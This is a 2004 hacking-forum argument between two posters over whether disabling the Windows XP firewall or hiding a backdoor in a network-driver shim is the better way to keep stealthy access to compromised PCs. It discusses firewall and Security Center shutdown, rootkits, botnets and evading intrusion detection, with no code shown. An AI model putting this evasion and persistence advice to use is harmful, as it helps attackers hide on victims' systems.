But I digress. I do hope that this post has made my previous points clearer. I don't think bad of you as a person (despite what you appear to think of me) I just disagree with disabling walls as a method of assuring access. I believe its loud, unecessary and indicative of someone who is sloppy or unskilled when it comes to cracking a box. You did that on any of my systems and you wouldn't be in there very long ; )

I stand by my original statement. Kicking down firewalls is dumb, obvious and unintelligent. I only presented my technique as a contrast because its the other end of the scale. Between the two are a hundred solutions that don't involve kicking down walls. It seems you'd rather focus on destroying my credibility than simply admitting that its administratively loud.

So, what are we left with? A character assassination?


It is now time, sir, to put your balls on the block. Are you prepared to state clearly and categoricaly what is impossible about what I have said ? Or has todays post cleared up any previous missunderstandings and ambiguities. You've put my reputation on the line here and all I ask is that you do the same. Well?

Looking forward to your reply.


SG
*edit* Ah, just noticed that you're a forum moderator. Since you hold a position of trust here I feel EVEN MORE insulted by your attempt to destroy my credibility. Paticularly when it is in terms so vague it makes disproving them difficult. Lucidate or apologise! (delete my post and run for the hills if you feel you cannot justify the bold position you have taken)

In any case you should be aware that I have been asked (by another member) to submit a full tute on this particular (unpublished) method for the next GSO newsletter. In the light of your nasty accusations I shall certainly do just that. It might be worthwhile to include several other ways around the firewall hook for those who, like yourself, can't quite grasp ring-0. Sorry, but boy am I angry! I hate posts like this one
Yorn
May 10 2004, 09:09 PM
QUOTE
Great, my stepfather died last night and nobody told me till today. So I'm in just the mood to come right back at you. Lets get this straight, you're saying that infecting the upper interface of the network driver sys is impossible? I'd say its ALMOST as simple as IAT patching (or is that also impossible?)


I don't understand the purpose for the comment about your stepfather other than a cheap tactic to garner emotional support in your favor. It doesn't waiver my resolve. No, I am not saying that specific thing is impossible. Nice attempt to build a straw man, but I'm not falling for it.

QUOTE
Lets get absolutely lucid about whats impossible here. And then at least I'll have the opportunity to drag you back to school in front of your peers. And, quite frankly, for your closing comments you'd deserve just that : )


Here's your full sentence:
QUOTE
The horror of this is that we can take advantage of the published interfaces and write our own shims for the transport/service/namespace, either in the stack (good for some things, not so much for this) or below userland where the NDIS resides along with miniport drivers and the drivers themselves.


Essentially what I am taking issue with is this: (modified quote)
QUOTE
... we can take advantage of the published interfaces and write our own shims for the transport/service/namespace ... below userland where the NDIS resides along with miniport drivers and the drivers themselves.


Can be done and will be done are two different things. You can't do this stuff, so when you talk about it like it is something special, you're sensationalizing.

QUOTE
I don't think I mentioned reliance on layer2 protocols did I ? Nor do I recall talking topology. I did, however, mention that this shim is in OSI layer 2. This means, of course, that we are operating below the protocol stack (Indeed, below Intermediate drivers, the NDIS, protocol drivers and the entire WS2 protocol chain) but that DOESN'T mean that we are communicating in layer 2 PDU's. You seem to have jumped at a false assumption. If we were it would only work across the segment, which I believe is the crux of your point about routers.


And what would be the point of disabling the firewall in Windows XP (the whole point of this thread) if it weren't for future exploitation? You don't disable the firewall for your trojan, you disable the firewall for the exploit and future exploits for the operating system like the RPC and LSASS vulnerabilities.

QUOTE
Instead, imagine that from where we are positioned we can utilise just about any protocol without invoking the stack, creating sockets or requiring raw socket support. The point? We are below the firewall hook and all it takes is knowing how packets are crafted (A lowly CCNA could manage that) and have enough coding skill to patch entrypoints to a published interface (100,000 examples from virii that have been patching jumptables since the 80's and numerous cracking tutorials patching IAT) Do you REALY need schooling on this?

I'm NOT saying that this is some damn UBERMETHOD. What I'm saying is that if you have any bloody appreciation of the systems you're cracking - and a modicum of damn motivation - this stuff is almost a no brainer. So get DriverStudio, a copy of the DDK, and you can do this in bloody delphi if you must ferchristsakes.


K, here's your problem. You say that the posters have to "craft packets" and "patch jumptables" and yet you're saying they should get beyond hex-editing Sub7. There's a vast difference in skill between those two. You aren't somewhere inbetween, or else you'd practice what you preach and come up with one of this simple "MSDDK" drivers that you talk about. Oh, and I would like it WHQL certified too!

QUOTE
Killing firewalls is about as stealthy as being hit with a brick. People have been hexing other peoples malware and bouncing around inside of systems with fireaxes for so long they've missed the damned point. What you propose isn't new, clever or even creative. It breaks no new ground and mimicks what people with no finese have been doing for decades. If its in the way just kick it down. is that hacking to you ? *sigh*


Actually, what I propose is actual technical information on how to do exactly that which I state in the topic: disable the Windows Firewall. I'm sorry if Misses DramaQueen finds spending her spare time with some lowlife VBS scripter painful. I'm trying to post something that is applicable and not too horribly difficult to understand.

I could post an EXE that did the same thing, but would anyone modify it to work for their situation? No. But you know what? I know of two people in the GSO IRC channel that modified the batch starting this post to do as they see fit. I'm not just *talking* here, Slippy, I'm *doing*.

I don't think disabling the Windows Firewall for a trojan that listens on a port is a good idea. And I don't claim that it is. But for a lot of these guys, it's all they know, and if they are going into security *THIS* applies to them. What you are proposing does not. And the reason why it doesn't is because if someone wants to go as far as you're describing there is absolutely not a damn thing that can be done about it save hope your IDS can catch what is swinging by it.

Still, it's sensationlism. A hardcore black hat can and would do it, but the kind of stuff you describe just plain doesn't happen.

QUOTE
The term 'Priority' doesn't make a great deal of sense when talking about patching the network driver to create a code shim between the NDIS and the base driver. what DOES make sense is that we're BELOW the kernel as the kernel sits on a hardware abstraction provided by drivers of the type we're shimming. If thats what you mean by 'priority' then you're at best mistaken. You do know we're threadless down here?


Yes, and I prefer "up here" when talking about it, but to each his own. Priority was used because believe it or not, there are ways to require that a driver be WHQL certified before installation (OS dependant, not user-dependent) on Microsoft operating systems. This means that the driver cannot be installed. You're also assuming that the program that is going to initially insert this driver is running as "admin" or has other system-level permissions.

QUOTE
But again, If you'd like to stake your reputation on a clear and definite statement of what is 'impossible' about this scenario then I'd more than welcome the chance to prove you conclusively and undeniably wrong.


Then do it, code your own driver. Make a Rootkit already and then watch how fast it gets detected. You talk as if there is all this magical stuff that happens that prevents IDS from detecting suspcious network traffic and Virusscanners from detecting rootkits. The only thing that prevents it is time. And no, the guys hexediting Subseven aren't going suddently write their own drivers.

QUOTE
1. Killing firewalls is loud, obvious and stupid. Yes or No!

Loud? Yes.
Obvious? Not exactly, but you must think so. To me, yes. To the lay user or novice admin, no.
Stupid? Not at all. You're assuming there are admins out there as equally paranoid (ie, checking up on firewall policies and etc) as you hope your potential customers are after you give them your sales pitch.

QUOTE
2. There are many better less noticeable methods. Yes or No!

No.

And here's why:

1) There aren't many at all. Ask any FXPr. He or she is going to want to infect and get them on a botnet or herded somewhere and then open up XDCC and make their "group" look good.

2) The guys who have been making rootkits don't advertise them or code them in such a way as to appeal to the guys doing the majority of the hacking. The point is, if you want a distro bot, you've GOT to open ports. And you've GOT to disable Windows Firewall.

3) It's not less noticeable, because end game, if you want to open a port for your XDCC distro, which 90% of the 'hackers' on this forum want to do, then you're going to either have to disable the firewall or go back to coding another fscking driver exception.

I'm not saying that your comments never apply, I am saying that they don't apply *here*. This stuff is potatoes to what you're trying to do. And what you're trying to do is way overkill and borderline impossible for these guys.

Now that I've answered two of your questions straight up, let me ask you two of my own:

1) Have you ever even written a trojan that does the things that you describe as "simple" to do?

2) Have you ever patched a Cisco router with a back-doored IOS?

#2 is just a continuation of the last thread you never finished.

QUOTE
Oh, and of course killing the firewall is never going to be noticed? No simple ID solution monitors this? Be more careful in your choice of arguments.


Not by the majority of computer users out there it isn't.

QUOTE
However, again, you seemed to have missed the point. Kernel hooking is higher level and much easier to deal with. The kernel sits on an abstract representation of the physical machine, the 'HAL' So, that in mind please throw away your notion of the kernel being in control of everything. Realise that we're talking about code that infects the network driver itself at its weakest and most accessible point (upfacing interface) and enjoys the unique status of having NOTHING between ITSELF and the NIC. No kernel, No hooks, No filters, Nothing*.

But, I offer you the chance to point me towards any software solution that installs a sensor that will detect packets originated in the network driver .SYS itself before hitting the NIC. You know of any replacement HAL's or something for this ? I'd genuinely be interested in finding one. Not that it matters a great deal because the question we're then left with is how widely implimented it is and I think you'd have to conceed my point.


Okay, now you're getting into some stuff that could potentially require the hacker to write a version of his driver for every single possible NIC out there. Which is just insane. How about you show me something that comes even remotely close to doing what *you* are describing? I don't doubt that it exists, but it sure as hell wasn't made by you.

QUOTE
Besides which, since you're saying that my idea has no credit on this score then you must be saying that killing the firewall outright is somehow less detectable ? Forgive me if I smile.


I'm not saying that at all. You sure don't hide your attempts at a straw-man tactic do you? You're trying to build me up as some overzealous admin that thinks the firewall is enough to provide security. That's not what I'm saying at all, instead I'm calling you a kook for thinking the kind of stuff you describe is commonplace or even something these guys can comprehend.

QUOTE
*In some rare instances the driver itself provides filter security. As I say, this is rare and even when present is hardly ever utilised.


Actually, IMHO this is far more commonplace now than in years previous, and I venture to guess it will only be moreso in the future.

QUOTE
I don't recall predicting the end of the world. I have said before that the windows kernel is woefully inadequate in terms of security and needs a complete rethink. I can point you to microsoft coders who have publicly admitted pretty much the same thing. Thats hardly 'fire and brimstone' stuff.


No, but I imagine you market it as that.

QUOTE
But I digress. I do hope that this post has made my previous points clearer. I don't think bad of you as a person (despite what you appear to think of me) I just disagree with disabling walls as a method of assuring access.


Okay, so then picture this scenario:
The administrator is a laid back kind of guy. He is sufficiently paranoid in that he kicks on the firewall and forces virus updates. He has an IDS and notices your workstation is sending and recieving odd packets.

So, he does some checking in his past logs and finds out you got in, loaded some malware via an HTA exploit. After all, how the hell are you going to be rooting Windows workstations when they have a firewall up? So he patches that exploit.

Sure enough, he finds the driver and sends it to his AV vendor. They update and bam, your rootkit is gone. He then goes back on his way, thinking he rocked you.

What could you have done differently? Disabled the firewall, so that way you'd be able to get in again in the future, perhaps with a less noticeable signature.

QUOTE
I believe its loud, unecessary and indicative of someone who is sloppy or unskilled when it comes to cracking a box. You did that on any of my systems and you wouldn't be in there very long ; )


Oh no? So if the user disabled the firewall, you'd re-enable it?

(Sorry if I find it ridiculous to comment on the rest of what you had to say about me being a moderator. I'm not going to be pigeonholed as some manipulative prick that deletes posts that he finds offensive, so effective immediately I'm going to request my moderator status be yanked since it offends you.)
Yorn
May 11 2004, 12:25 AM
K, for those of you worried about stealth (because one of the "updates" added the Security Center service which complains and pops up crap as soon as the Firewall shuts off) I added a shutdown and disable for the Security Center service.
SlippyG
May 11 2004, 01:45 AM
QUOTE (Yorn @ May 10 2004, 09:09 PM)
I don't understand the purpose for the comment about your stepfather other than a cheap tactic to garner emotional support in your favor. It doesn't waiver my resolve. No, I am not saying that specific thing is impossible. Nice attempt to build a straw man, but I'm not falling for it.

You said you were having a bad day. Me too, very much so. Just so that you know I don't BS about such things I will PM you his full name and the telephone number for the chapel of rest. But don't make this the issue, its not.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
Can be done and will be done are two different things. You can't do this stuff, so when you talk about it like it is something special, you're sensationalizing.

Then when I write this up and submit it to the next GSO newsletter you'll stand corrected and apologise for being so lame : ) You don't know me at all so I've got no choice but to take it personally when you say it can be done but not by me. Thats a guess, and an ill-informed one. What IS obvious however is that you just don't get it (As evidenced by your lack of understanding displayed in the previous post)

Equivalent to Kernel hooking - my ass
layer 2 gets stripped at your router - 100% irrelevant
It would get spotted by sensors you still fail to specify - And killing firewalls wont?


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
I don't think I mentioned reliance on layer2 protocols did I ? Nor do I recall talking topology. I did, however, mention that this shim is in OSI layer 2. This means, of course, that we are operating below the protocol stack (Indeed, below Intermediate drivers, the NDIS, protocol drivers and the entire WS2 protocol chain) but that DOESN'T mean that we are communicating in layer 2 PDU's. You seem to have jumped at a false assumption. If we were it would only work across the segment, which I believe is the crux of your point about routers.

And what would be the point of disabling the firewall in Windows XP (the whole point of this thread) if it weren't for future exploitation? You don't disable the firewall for your trojan, you disable the firewall for the exploit and future exploits for the operating system like the RPC and LSASS vulnerabilities.

Huh? what? You took days to respond and this is what you come up with ???

Firstly its not at all relevant to the paste you make - and secondly, if you've already got IN you don't need the exploit anymore. You move on to rootkits and backdoors. Why? because at some point they're gonna patch (quicker if you take down the firewall services). c'mon. You're not even trying to make sense here.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
K, here's your problem. You say that the posters have to "craft packets" and "patch jumptables" and yet you're saying they should get beyond hex-editing Sub7. There's a vast difference in skill between those two.

Quite, one requires some skill and the other doesn't. Hence I say they should aim to get past hexing subseven. Makes sense to me.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
You aren't somewhere inbetween, or else you'd practice what you preach and come up with one of this simple "MSDDK" drivers that you talk about. Oh, and I would like it WHQL certified too!

Well, firstly I have. Sure its not RIGHT on top of the NIC - I still have HAL in the way but thats unavoidable since I can't garauntee an NE2000 compatible card and I like my backdoor code to be portable. So, I feed packets into the driver on behalf of the NDIS and it formats the hardware specific stuff and makes HalInitSystem, READ_PORT_* and WRITE_PORT_* calls for me so I don't have to worry about the underlying hardware at all.

Secondly, you don't NEED it to be WHQL certified. Unless of course I want it adorned with a shiny windows approval logo. Hell, its not even authorised why the hell would I bother to get it approved! It couldn't BE approved either - it doesn't even fit within the evaluation criteria. Jesus man, get a grip!


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
Killing firewalls is about as stealthy as being hit with a brick. People have been hexing other peoples malware and bouncing around inside of systems with fireaxes for so long they've missed the damned point. What you propose isn't new, clever or even creative. It breaks no new ground and mimicks what people with no finese have been doing for decades. If its in the way just kick it down. is that hacking to you ? *sigh*


Actually, what I propose is actual technical information on how to do exactly that which I state in the topic: disable the Windows Firewall. I'm sorry if Misses DramaQueen finds spending her spare time with some lowlife VBS scripter painful. I'm trying to post something that is applicable and not too horribly difficult to understand.

And I posted that it would be administratively loud and rather ill advised. Something you still seem reluctant to comment on. Re-read my first post.

QUOTE (Yorn @ May 10 2004, 09:09 PM)
I'm not just *talking* here, Slippy, I'm *doing*.

Granted. And I made an observation that you are avoiding like the plague. Why kick down a firewall when its sure to get noticed and there are many alternatives. Or don't you think that stealth should be a priority when commiting a crime.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
I don't think disabling the Windows Firewall for a trojan that listens on a port is a good idea. And I don't claim that it is. But for a lot of these guys, it's all they know, and if they are going into security *THIS* applies to them. What you are proposing does not. And the reason why it doesn't is because if someone wants to go as far as you're describing there is absolutely not a damn thing that can be done about it save hope your IDS can catch what is swinging by it.

If this is all they know then they don't apply to the field of security. Regardless, why do you begrudge them the simple caveat that this is loud and could get them caught with their fingers in the cookie jar.

I'm sorry you think that we should talk down to these people. Personally I don't think so. I already have two coders with prior DDK experience motivated to try this.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
Still, it's sensationlism. A hardcore black hat can and would do it, but the kind of stuff you describe just plain doesn't happen.

You've been hanging around in IRC and forums too long. Like every other admin who looks in here you are left with the impression that the hacking scene hasn't evolved past discussing packing tools and modding trojans.

These people are not hackers for christsakes. And you, sir, appear not to know the difference. The reason this 'doesn't happen' in your world is because there are a hundred thousand talentless morons to every motivated hacker and you are seeing them all.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
Yes, and I prefer "up here" when talking about it, but to each his own. Priority was used because believe it or not, there are ways to require that a driver be WHQL certified before installation (OS dependant, not user-dependent) on Microsoft operating systems. This means that the driver cannot be installed. You're also assuming that the program that is going to initially insert this driver is running as "admin" or has other system-level permissions

And if I were installing a driver that would be relevant. I am not, firstly because of the complexity and secondly because I generaly cannot assume NE2000 compatibility. So, we use the driver thats already installed and insert our trampoline routines into the jumptable. I'm not in the business of writing trojan drivers - just shims for legitimate drivers.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
Then do it, code your own driver. Make a Rootkit already and then watch how fast it gets detected. You talk as if there is all this magical stuff that happens that prevents IDS from detecting suspcious network traffic and Virusscanners from detecting rootkits. The only thing that prevents it is time.

I don't code drivers. I've made a rootkit and it isn't detected because it isn't public release (no magic involved) it isn't LIKELY to get detected because admins have missed it since day one.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
And no, the guys hexediting Subseven aren't going suddently write their own drivers.

Yorn. Don't you think I know that? I don't think 90% of the people on this board even have the potential to be anything more than than hexers. If they could code they'd code they're own and probably never have to worry about it again. I'm not going to knock myself out trying to give them lessons they'll never appreciate.

I'm just raising the point that killing a firewall is administratively loud. In doing so I have found two people here with DDK experience that have the determination and skill to realise its where they want to be and they are now going for it!!!

Result! The rest of you can kill firewalls till your blue in the face - I just want you to remember that it is administratively loud and should bear a huge caveat - particularly where your freedom is at stake. Don't begrudge them that!


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
1. Killing firewalls is loud, obvious and stupid. Yes or No!

Loud? Yes.
Obvious? Not exactly, but you must think so. To me, yes. To the lay user or novice admin, no.
Stupid? Not at all. You're assuming there are admins out there as equally paranoid (ie, checking up on firewall policies and etc) as you hope your potential customers are after you give them your sales pitch.

My customers, dear boy, know immediately when a security service fails on any of their boxes.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
2. There are many better less noticeable methods. Yes or No!

No.

NO ??????


QUOTE (Yorn @ May 10 2004, 09:09 PM)
1) There aren't many at all. Ask any FXPr. He or she is going to want to infect and get them on a botnet or herded somewhere and then open up XDCC and make their "group" look good.

ROFL, okay granted. If you're gonna be spotted anyway then theres little point being subtle. hehehe


QUOTE (Yorn @ May 10 2004, 09:09 PM)
2) The guys who have been making rootkits don't advertise them or code them in such a way as to appeal to the guys doing the majority of the hacking. The point is, if you want a distro bot, you've GOT to open ports. And you've GOT to disable Windows Firewall.

You're saying the losers and warezkiddies ain't got a clue and don't need one then I'm with you.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
3) It's not less noticeable, because end game, if you want to open a port for your XDCC distro, which 90% of the 'hackers' on this forum want to do, then you're going to either have to disable the firewall or go back to coding another fscking driver exception.

90% - I seem to remember talking about that very group. They're the ones I realy don't care about. But yes, when talking about the majority of losers out there subtlety has no value.

But then - I didn't know GSO was here simply for them to exchange ideas.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
I'm not saying that your comments never apply, I am saying that they don't apply *here*.

No, correction. You're saying I don't know dick. You're saying that if it doesn't work for the simple majority then it has no place here.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
This stuff is potatoes to what you're trying to do. And what you're trying to do is way overkill and borderline impossible for these guys.

This was never about my method. This was about pointing out that there are alternatives if you don't want to be administratively loud. Im hoping that some of us are NOT bot herders.

But you're right pointing out that most of the people here can't use this and don't need this. I didn't post to be popular, if I had I would be posting CC#s, porn passes and writing a k-rad packer.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
1) Have you ever even written a trojan that does the things that you describe as "simple" to do?

I've written many backdoors. Yes, one sits on the network driver sys in the way discussed and is incredibly stable. Others have been intermediate mode drivers and simple .DLL's placed into the protocol stack as a Layered Service Provider. I stopped making socket calls a long long time ago.

Simple? To a coder who can read a little ASM, yes. The Intermediate and LSP route is incredibly simple, in fact there is plenty of skeleton code around (I started with a skeleton for both, quite happy to admit it!)


QUOTE (Yorn @ May 10 2004, 09:09 PM)
2) Have you ever patched a Cisco router with a back-doored IOS?

Myself? Only 4000 series and it was basic. Certainly not as good as I saw demonstrated at HIP, this was just a simple shortcut to priv exec with a fixed pass. Nothing special.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
Oh, and of course killing the firewall is never going to be noticed? No simple ID solution monitors this? Be more careful in your choice of arguments.

Not by the majority of computer users out there it isn't.

Again, we're setting our sights low. You're right, the majority of systems are home setups with little protection. Hardly a challenge.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
However, again, you seemed to have missed the point. Kernel hooking is higher level and much easier to deal with. The kernel sits on an abstract representation of the physical machine, the 'HAL' So, that in mind please throw away your notion of the kernel being in control of everything. Realise that we're talking about code that infects the network driver itself at its weakest and most accessible point (upfacing interface) and enjoys the unique status of having NOTHING between ITSELF and the NIC. No kernel, No hooks, No filters, Nothing*.

But, I offer you the chance to point me towards any software solution that installs a sensor that will detect packets originated in the network driver .SYS itself before hitting the NIC. You know of any replacement HAL's or something for this ? I'd genuinely be interested in finding one. Not that it matters a great deal because the question we're then left with is how widely implimented it is and I think you'd have to conceed my point.

Okay, now you're getting into some stuff that could potentially require the hacker to write a version of his driver for every single possible NIC out there. Which is just insane. How about you show me something that comes even remotely close to doing what *you* are describing? I don't doubt that it exists, but it sure as hell wasn't made by you.

No, I'm not 'getting into' anything. Nothing has changed here except your perception. As discussed - This is a shim, NOT A DRIVER. Yes I HAVE written it. and FOR GODS SAKE stop talking like its 'walking on water' !!


QUOTE (Yorn @ May 10 2004, 09:09 PM)
instead I'm calling you a kook for thinking the kind of stuff you describe is commonplace or even something these guys can comprehend.

Find where I said it was commonplace! I said there were MANY other methods that didn't involve kicking down walls. I am right.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
*In some rare instances the driver itself provides filter security. As I say, this is rare and even when present is hardly ever utilised.

Actually, IMHO this is far more commonplace now than in years previous, and I venture to guess it will only be moreso in the future.

It is. I realy would like to see it standard practice as it realy would lower the bar if done correctly.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
I don't recall predicting the end of the world. I have said before that the windows kernel is woefully inadequate in terms of security and needs a complete rethink. I can point you to microsoft coders who have publicly admitted pretty much the same thing. Thats hardly 'fire and brimstone' stuff.

No, but I imagine you market it as that.

I don't market this at all : ) Some tools are for work and others are for play.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
QUOTE
I believe its loud, unecessary and indicative of someone who is sloppy or unskilled when it comes to cracking a box. You did that on any of my systems and you wouldn't be in there very long ; )

Oh no? So if the user disabled the firewall, you'd re-enable it?

What the hell are you talking about! A cracker should leave everything as he found it if thats what you're asking. Although, I must admit to being a little confused by your response.


QUOTE (Yorn @ May 10 2004, 09:09 PM)
(Sorry if I find it ridiculous to comment on the rest of what you had to say about me being a moderator. I'm not going to be pigeonholed as some manipulative prick that deletes posts that he finds offensive, so effective immediately I'm going to request my moderator status be yanked since it offends you.)

Oh, don't do that. Your personal attack offends me. Not your status.


I do so enjoy our little 'chats' and believe it or not I realy can see where you're coming from. You're looking at the big picture, the millions of talentless point'n'click kids wanting to ream off some bandwidth to serve warez. Personaly I consider them background noise. Easy to deal with and hardly worth discussing.

They're certainly not the people I want to help. Hell, I wouldn't give them the time of day.

I met three people during this chat (Two from this board) and one from a certain +1(801) voicebridge where I was discussing our little tiff. All three are talented and stand a chance of doing this themselves. One guy even started listing off all the points he'd have to hook and said he'd wished he'd thought of it before.

I agree that to 90% (probably more) of the people reading this forum the whole thing just sounds like a complete waste of time. I didn't think we were here to appease the majority.

But just to clear things up. I apologise for offending you and for trying to make this forum something it is not. Perhaps, instead, I should endeavour to write a special botnetters hexing tutorial or perhaps a k-rad guide to telnet. Who knows. I just wish someone had informed me earlier that all posts must appeal to the lowest common denominator.

Its clear that you have your views and I have mine. I'll never change mine because its who I am and what I do. But that doesn't mean I should argue with yours.


Take care Yorn.
*lick*


SG
Yorn - Nows your chance. Write what you like because I ain't revisiting this thread. I understand you. You understand me. They *points around* dont understand jack (But thats okay cus, like you say, they don't wanna)

Now can we PLEASE stop writing this crud now cus there ain't nobody left reading it! I promise to never again insult the readers intelligence by assuming they've got potential. Honest.
Yorn
May 11 2004, 06:48 PM
QUOTE
Now can we PLEASE stop writing this crud now cus there ain't nobody left reading it! I promise to never again insult the readers intelligence by assuming they've got potential. Honest.


No offense, but when I have legitimate arguments and think you are taking a stance in err, I don't quit just because there isn't an audience. I don't care if their is an audience or not, I'm not trying to "one up" or insult someone's reputation. I also don't abuse moderator, hell, I didn't want to be one in the first place: I was asked to fill a void. This is not about you insulting reader's intelligence, it is about a false sense of security that rootkits give hackers.

You never (and I mean NEVER) seem to grasp what I am getting at. Perhaps it is because you don't see it from an administrator's point of view. The reality of the matter is, the kind of administrator that can run and detect odd packets internally with his IDS is the same kind of administrator that would look for disabled services on a Windows box. Which means that you're not going to fool him/her with a rootkit anymore than disabling the Firewall and Windows Security Center (which are done stealthily now in SP2 with the latest revision to the batch file).

A rootkit that hides itself cannot be installed as a user if you configure Windows operating systems properly. Apparently you think that the Windows workstation is going to be compromised in the same manner as the RPC and LSASS vulnerabilities once Windows Firewall is up. I'm sorry, it's not gonna happen! The purpose of disabling the Firewall is for future compromises after the AV software has detected their bot.

No, I don't take to insulting the userbase kindly. Because as stealthly as you may think you are, you don't control the sheer kinds of numbers as some of the other users on here do. You aren't the reason why I get calls from departments asking "how do I remove Firedaemon?". A skillful malicious blackhat is far less dangerous than what you would call "an unskilled malicious skiddie".

Now, the question is, *why*? Why is it that Sasser infects 3,000 workstations at Wells Fargo? Why does KPMG have to spend 2 days cleaning out Blaster? Why does Ohio State end up getting blacklisted by several other universities because of SPAM? Why does Greenpeace's website have a picture of a guy fscking a tree on it? These are the *real* issues, and they are the issues that security consultants don't answer for some unanswered reason. The truth of the matter is, if a hacker wants to get in, they are going to get in, and it doesn't help that if they get to that *one* workstation or *one* machine inside the Intranet that they can infect thousands.

QUOTE
But don't make this the issue, its not.

I fail to see why it was even mentioned in the first place. I don't care about your personal life.

QUOTE
Then when I write this up and submit it to the next GSO newsletter you'll stand corrected and apologise for being so lame : )

If you actually write anything that anyone on here can use, and not just "what-ifs" and "you're all so stupid why don't you just use mind bullets" then I'll apologize. Right now you sound like a sensationalist, and you've yet to indicate you're anything but.

QUOTE
Equivalent to Kernel hooking - my ass

I don't know how you define the term, but when you release this supposed program or method that you're talking about, I'll explain exactly why it is no different than rootkit.com and the ilk.

QUOTE
layer 2 gets stripped at your router - 100% irrelevant

It sounded like you were talking about pipe fantasies like this. The problem is that you're working under the assumption that the first workstation you compromise remotely on a corporation's Intranet is going to be the only one you need to. Your NDIS driver (regardless of if you call it a shim or not, it's still a driver according to the OS) isn't going to do you a whole lot of good.

Ironically, the best thing to do once in the Intranet would be to do a shit-ton of loud stuff, using LSASS, RPC, and every other exploit loudly and disabling the firewall on each machine compromised. Why? Cause it would distract from the quiet work you are doing otherwise and once the workstation was patched the admin might overlook any odd activity.

QUOTE
It would get spotted by sensors you still fail to specify - And killing firewalls wont?


VICE catches what you intend to do. That's assuming you can even get the driver installed.

Okay, let me explain what I use, I use a modified SNORT that sits between the router and our internal network looking for anything outgoing outside of port 80 and drop all incoming that isn't authorized. If an IP is accounted for, it's not going out, so you can create all the packets you want, the router isn't passing them anywhere.

QUOTE
if you've already got IN you don't need the exploit anymore.


I once saw a hacker install a piece of legitimate software that was compromisable on a non-default port so he could later access the machine after his trojan was found. Now *that* is hacking.

You're making two really huge mistakes:
1) Overestimating the skill of the board (or magazine) audience.
2) Overstating the skill of the administrator that would try to stop them.

QUOTE
Quite, one requires some skill and the other doesn't. Hence I say they should aim to get past hexing subseven. Makes sense to me.


You cannot seriously expect me to believe that someone is going to learn what you say they should when you talking in generalizations about what they are doing. There is a reason you don't get into specifics on the subject. The reason is because it is very difficult to do and be compatible across all flavors of the Microsoft operating system.

QUOTE
Well, firstly I have. Sure its not RIGHT on top of the NIC - I still have HAL in the way but thats unavoidable since I can't garauntee an NE2000 compatible card and I like my backdoor code to be portable.


No see, that's the problem. You can't guarantee NE2000, 3com, or Realtek compatible cards. So the *WHOLE ENTIRE GD DRIVER ARGUMENT* is blown out of the water, the guys that are going to want to scan for this stuff (paranoid admins) will eventually get a scanner to do just that and catch what you are using now. Hell, there's already something out there that does: me.

Why in god's name would someone compromise success for stealth on this or any forum? The objective is to get in and get in properly. With an LSASS-type vulnerability, the workstation is rebooting afterwards, so you may have *one* and only one chance to compromise the machine and you're saying these guys should be writing drivers?

QUOTE
Secondly, you don't NEED it to be WHQL certified. Unless of course I want it adorned with a shiny windows approval logo. Hell, its not even authorised why the hell would I bother to get it approved! It couldn't BE approved either - it doesn't even fit within the evaluation criteria. Jesus man, get a grip!


You realize, of course, that the same kind of software that checks for Windows Services being shut down or off can check to make sure your drivers are WHQL certified. Also, it can be checked in such a way that you can't hide it even if you jump API calls.

QUOTE
And I posted that it would be administratively loud and rather ill advised. Something you still seem reluctant to comment on. Re-read my first post.

This leaves us with the question, why bother negotiating firewalls when the open architecture allows us to sneak in underneath their own layered drivers and leave the firewall (regardless of vendor) apparently functioning normaly. Everyone is using sledgehammers to crack a very small nut indeed.


Because you are assuming that you can hide forever and I am not. You compromise one workstation and move to the next one. You compromise a workstation someone else already compromised (like a botnet herder) and use it to do whatever you want. The reason why stealth isn't necessary is because those that are compromising these machines compromise hundreds if not thousands at once. They can chain through them to hide where they are coming from and *then* do whatever it is that you describe. And ultimately, they can't be traced, even by an IDS. You, however, can.

QUOTE
Granted. And I made an observation that you are avoiding like the plague. Why kick down a firewall when its sure to get noticed and there are many alternatives. Or don't you think that stealth should be a priority when commiting a crime.


The kind of stealth you are talking about pales in comparision to the type of stealth I am talking about. Try tracing someone who has jumped through 3 workstations. If anything is impossible, it's finding that one foreign ISP and learning how to speak Farsi.

QUOTE
I'm sorry you think that we should talk down to these people. Personally I don't think so. I already have two coders with prior DDK experience motivated to try this.


*I* think we should talk down to "these people"?

Witness:
QUOTE
You're saying the losers and warezkiddies ain't got a clue and don't need one then I'm with you.

QUOTE
They're the ones I realy don't care about. But yes, when talking about the majority of losers out there subtlety has no value.

QUOTE
I don't think 90% of the people on this board even have the potential


I don't think they are losers. I just think that they are going to have a HARD time even getting close to coding their own rootkits.

QUOTE
But then - I didn't know GSO was here simply for them to exchange ideas.


There are no forums that have a modicum of advanced hacking knowledge. GSO comes the closest with the lowest turnover ratio and the least amount of internal dispute.